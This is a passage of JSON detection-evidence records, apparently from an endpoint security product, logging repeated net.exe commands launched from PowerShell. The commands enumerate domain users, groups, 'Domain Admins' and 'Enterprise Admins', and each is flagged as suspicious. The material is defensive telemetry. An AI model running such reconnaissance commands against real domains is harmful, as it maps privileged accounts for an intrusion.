"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:52.3233333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\system32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:11:21.7952738Z", "processId": 1176, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:52.39Z", "fileName": "net.exe", "filePath": "C:\\Windows\\system32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:11:21.856882Z", "processId": 11744, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:52.59Z", "fileName": "net.exe", "filePath": "C:\\Windows\\system32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:11:22.2347953Z", "processId": 5408, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:33.9066667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:13:38.9768516Z", "processId": 12244, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:34.2333333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:13:39.1743954Z", "processId": 10884, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:34.71Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:13:39.2339429Z", "processId": 5540, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:34.8466667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:13:39.424954Z", "processId": 6960, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:35.3366667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:13:39.9876367Z", "processId": 11612, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:54.56Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:15:36.944242Z", "processId": 11604, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:54.8Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:15:37.0643284Z", "processId": 9752, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:54.93Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:15:37.2283058Z", "processId": 2728, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:55.01Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:15:37.8873532Z", "processId": 5768, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:55.0866667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:15:38.6502592Z", "processId": 4344, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:48.41Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:21:54.3280171Z", "processId": 11648, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:48.77Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:21:54.462992Z", "processId": 9500, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:48.8466667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:21:54.4135787Z", "processId": 2072, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:48.9566667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:21:54.5235731Z", "processId": 6756, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:49.0633333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:21:54.9478604Z", "processId": 10696, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:48.93Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:23:22.6060484Z", "processId": 11564, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:49.2966667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:23:22.6572203Z", "processId": 2468, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:49.4833333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:23:22.6947155Z", "processId": 8728, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:49.5533333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:23:22.749744Z", "processId": 8636, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:49.95Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:23:23.2808896Z", "processId": 2800, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:50.0733333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:24:16.9550684Z", "processId": 11620, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:50.4733333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:24:17.0125413Z", "processId": 10712, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:25:51.4Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:24:17.0616669Z", "processId": 2832, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": 